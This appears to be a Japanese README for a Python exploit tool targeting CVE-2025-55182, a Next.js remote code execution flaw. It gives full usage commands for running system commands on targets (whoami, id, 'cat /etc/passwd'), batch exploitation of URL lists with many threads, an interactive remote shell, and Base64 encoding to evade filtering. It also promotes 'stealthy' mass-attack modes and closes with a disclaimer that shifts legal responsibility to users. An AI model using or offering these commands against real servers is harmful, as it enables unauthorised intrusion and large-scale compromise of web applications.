
PythonベースのCVE-2025-55182(Next.js RCE)エクスプロイト。単一/バッチターゲットスキャン、コマンド実行、対話型シェル、Base64エンコーディング対応の4つの攻撃モードを備えています。
本ツールは CVE-2025-55182 の脆弱性(Next.js 関連フレームワークのコード実行脆弱性と推測)を検出・悪用するために使用します。単一ターゲット/複数ターゲットの一括検出、コマンド実行、対話型シェルなどの機能をサポートし、さまざまなシナリオに対応する4種類の攻撃モードを提供します。Base64エンコードコマンド、プロキシ転送、ログ出力などの柔軟な設定に対応しています。
CVE-2025-55182 の脆弱性は Next.js 関連アプリケーションに存在する可能性があります。悪意のあるリクエストを構築して _response 内の実行ロジックを改ざんし、child_process モジュールの呼び出しを注入することで、リモートコード実行(RCE)を実現します。本ツールは特別に細工したフォームデータを送信することで脆弱性をトリガーし、コマンド実行結果を返します。
requestspip install requests
# whoami コマンドを実行(攻撃モード1:レスポンスあり)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"
# システムコマンドを実行(Base64エンコードで特殊文字の遮断を回避)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b
# 完全レスポンスモード(Base64デコードで結果を返す)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4
# ファイルからターゲットURLを読み込み、id コマンドを一括実行(20スレッド)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log
# ターゲットに接続し、対話型コマンドラインに入る(Base64エンコード切り替え対応)
python CVE-2025-55182-exploit.py -u https://target.com -s
# Burp Suite プロキシ経由でパケットキャプチャ解析
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080
| パラメータ名 | 省略形 | 必須 | 説明 | 例 |
|---|---|---|---|---|
--url | -u | いいえ | 単一のターゲットURL(-l とは二択、-u が優先) | -u https://target.com |
--url-list | -l | いいえ | ターゲットURLリストファイル(1行に1URL、プロトコルヘッダなしでも自動でhttp/httpsを補完) | -l urls.txt |
--payload | -p | いいえ | 攻撃モード(デフォルト:1) 1=レスポンスあり(execSync) | 2=レスポンスなし(execSync) 3=レスポンスなし(exec) |
--cmd | -c | いいえ | 実行するシステムコマンド(一括モード/単一ターゲットのコマンド実行で必須、-s とは排他) | -c "whoami" または -c "dir" |
--threads | -t | いいえ | 一括検出のスレッド数(デフォルト:10、50以下を推奨) | -t 20 |
--outlog | -o | いいえ | ログ出力ファイル(デフォルト:cve-2025-55182.log) | -o exploit.log |
--base64 | -b | いいえ | -c で指定したコマンドをBase64エンコード(特殊文字の遮断を回避) | -c "cat /etc/passwd" -b |
--cmd-shell | -s | いいえ | 対話型シェルモード(単一ターゲット -u のみ対応、-c とは排他) | -u https://target.com -s |
--proxy | - | いいえ | プロキシ設定(HTTP/HTTPSプロキシ対応。パケットキャプチャやトラフィック転送用) | --proxy http://127.0.0.1:8080 |
--skip-check | - | いいえ | プロキシ接続チェックをスキップ(デフォルトではプロキシの可用性を検証) | --proxy http://127.0.0.1:8080 --skip-check |
--time-out | - | いいえ | リクエストのタイムアウト時間(単位:秒、デフォルト:10) | --time-out 15 |
| モード番号 | モード説明 | 特点 | 適用シーン |
|---|---|---|---|
| 1 | レスポンスあり(execSync) | 同期的にコマンドを実行し、303リダイレクトを返す。結果はレスポンスヘッダーに含まれる | 脆弱性の存在をすばやく検証 |
| 2 | レスポンスなし(execSync) | 同期的にコマンドを実行するが、結果は返らない(他の方法で実行効果を確認する必要がある) | ステルス性の高い操作 |
| 3 | レスポンスなし(exec) | 非同期的にコマンドを実行し、結果は返らない(痕跡が少なく、確認不要の操作に適する) | ステルス性の高い一括攻撃 |
| 4 | 完全レスポンス | 同期的にコマンドを実行し、結果をBase64エンコードしてレスポンスボディで返す(ツールが自動デコード) | 完全なコマンド出力を確認したいシーン |
-s モードに入ると、以下の組み込みコマンドを使用できます:
| コマンド | 機能説明 |
|---|---|
b64 | Base64エンコードコマンドモードに切り替え |
nob64 | Base64エンコードモードを終了 |
exit | 対話型シェルを終了 |
? | ヘルプ情報を表示 |
--outlog で指定したファイルに自動的に書き込まれ、後続の分析に便利です;-u と -l は二択です。両方指定した場合は -u が優先されます;-c と -s は排他です。-s モードでは -c の指定は不要です;-l ファイル内のURLにプロトコルヘッダがない場合(例:target.com)、ツールは自動的に http:// と https:// を試みます;https://target.com)を手動で指定することを推奨します;-b または b64 モードを有効にすると、ツールが自動的にBase64エンコード/デコードを処理するため、手動操作は不要です;--time-out のタイムアウト時間を増やし、誤判定を避けてください。--skip-check を使用してチェックをスキップしてください;-p 4 完全レスポンスモード);-b)を有効にして、コマンドがターゲットシステムに遮断されるのを防ぎます;--time-out のタイムアウト時間を増やしてください;http://target.com)を試してください。本ツールはサイバーセキュリティ研究および脆弱性検証のみを目的としています。使用者が『ネットワーク安全法』などの関連法規に違反したことにより生じる一切の結果は、全て使用者自身が負担するものとし、ツール開発者とは無関係です。